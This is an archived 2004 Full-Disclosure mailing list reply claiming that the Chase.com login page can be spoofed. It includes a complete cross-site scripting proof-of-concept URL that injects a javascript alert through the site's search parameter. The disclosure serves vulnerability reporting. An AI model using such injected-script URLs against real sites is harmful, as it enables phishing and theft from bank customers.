[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: Re: [Full-Disclosure] http://www.chase.com/ vulnerability
From: "http-equiv () excite ! com" <1 () malware ! com>
Date: 2004-05-29 16:14:37
Message-ID: 200405291614.i4TGEbws007205 () web120 ! megawebservers ! com
[Download RAW message or body]
Pathetic.
Since you can spoof the main log in site all security calls to
check for the 'little' padlock icon to determine the site is
real doesn't exist on it plus the site has cross-site scripting
capabilities:
http://chase.com/inetSearch/index.jsp?
pageType=&q=f&sort=2&start=1&num=10&lr=&restrict=&gce=&siteID=&se
archoption=&querytext=%22%22%3E%3Cimg%20dynsrc=javascript:alert
()%3E
Best keep your money under your mattress.
--
http://www.malware.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic